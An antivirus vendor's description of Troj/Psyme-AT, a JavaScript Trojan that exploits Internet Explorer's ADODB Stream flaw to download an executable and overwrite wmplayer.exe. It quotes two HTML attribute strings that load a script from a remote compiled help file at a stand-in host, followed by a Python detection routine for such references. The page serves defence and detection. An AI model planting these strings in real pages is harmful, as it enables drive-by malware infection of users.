Summary

| How it spreads | |
|---|---|
| Affected operating systems | Windows |
| Included in our products from | November 2004 (3.87) |
| Protection available since | 13 September 2004 09:40:06 (GMT) |
| Detected by | All Sophos products |
Action

Please follow the instructions for removing Trojans.
More Information
Troj/Psyme-AT is a JavaScript Trojan which exploits the ADODB Stream vulnerability associated with Microsoft Internet Explorer to silently download an executable file from a remote server to the local computer.
The executable is saved as wmplayer.exe and wmplayer.exe.bak to the following locations (if they exist), replacing legitimate versions of wmplayer.exe:
C:\Program Files\Windows Media Player\wmplayer.exe
C:\Programmer\Windows Media Player\wmplayer.exe
C:\Program\Windows Media Player\wmplayer.exe
C:\Programme\Windows Media Player\wmplayer.exe
C:\Programmi\Windows Media Player\wmplayer.exe
C:\Programfiler\Windows Media Player\wmplayer.exe
C:\Programas\Windows Media Player\wmplayer.exe
C:\Archivos de programa\Windows Media Player\wmplayer.exe
D:\Program Files\Windows Media Player\wmplayer.exe
D:\Programmer\Windows Media Player\wmplayer.exe
D:\Program\Windows Media Player\wmplayer.exe
D:\Programme\Windows Media Player\wmplayer.exe
D:\Programmi\Windows Media Player\wmplayer.exe
D:\Programfiler\Windows Media Player\wmplayer.exe
D:\Programas\Windows Media Player\wmplayer.exe
D:\Archivos de programa\Windows Media Player\wmplayer.exe
Troj/Psyme-AT can arrive on the computer when the user browses websites whose HTML pages contain the script, or loads an HTML page that contains a link to an infected page. For example, an HTML page may contain:
data=html:file://C:\\unknown.mht!http://unknown.com/dial.chm::/x.htm
src=http://unknown.com/dial.chm::/x.htm
where dial.chm is a compiled HTML help file containing x.htm, and x.htm is an HTML file containing the Troj/Psyme-AT script.
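A detection check for the reference pattern described above, as an added example that is not part of the original Sophos description: it scans page text (for instance from a proxy or mail gateway capture) for a remote `.chm::/` reference and records whether it is wrapped in a local `.mht!` prefix. The function name, the regular expressions and the sample input (including the benign example.org link) are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# A compiled help file fetched over HTTP(S) and opened at an inner page:
#   http://host/path/file.chm::/inner.htm
REMOTE_CHM = re.compile(
    r'(?P<url>https?://[^\s"\'<>!]+?\.chm)::/?(?P<inner>[^\s"\'<>]+)',
    re.IGNORECASE,
)
# Optional wrapper seen in the description: file://<local path>.mht!<remote url>
MHT_PREFIX = re.compile(r'file://[^\s"\'<>!]+\.mht!$', re.IGNORECASE)


def find_remote_chm_refs(text):
    """Return one finding per remote .chm::/ reference found in `text`."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in REMOTE_CHM.finditer(line):
            findings.append({
                "line": lineno,
                "host": urlsplit(m.group("url")).hostname,
                "chm": m.group("url"),
                "inner": m.group("inner"),
                # True when the URL directly follows a file://...mht! prefix
                "mht_wrapper": bool(MHT_PREFIX.search(line[:m.start()])),
            })
    return findings


# Constructed sample: the two attribute strings from the description plus a
# benign link to a .chm download, which must not be flagged.
SAMPLE = "\n".join([
    r"data=html:file://C:\\unknown.mht!http://unknown.com/dial.chm::/x.htm",
    "src=http://unknown.com/dial.chm::/x.htm",
    '<a href="http://example.org/help/manual.chm">manual</a>',
])

if __name__ == "__main__":
    for f in find_remote_chm_refs(SAMPLE):
        print(f)
```

A plain link to a `.chm` file is not reported; only references that address a page inside a remotely hosted help file with `::/` are.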
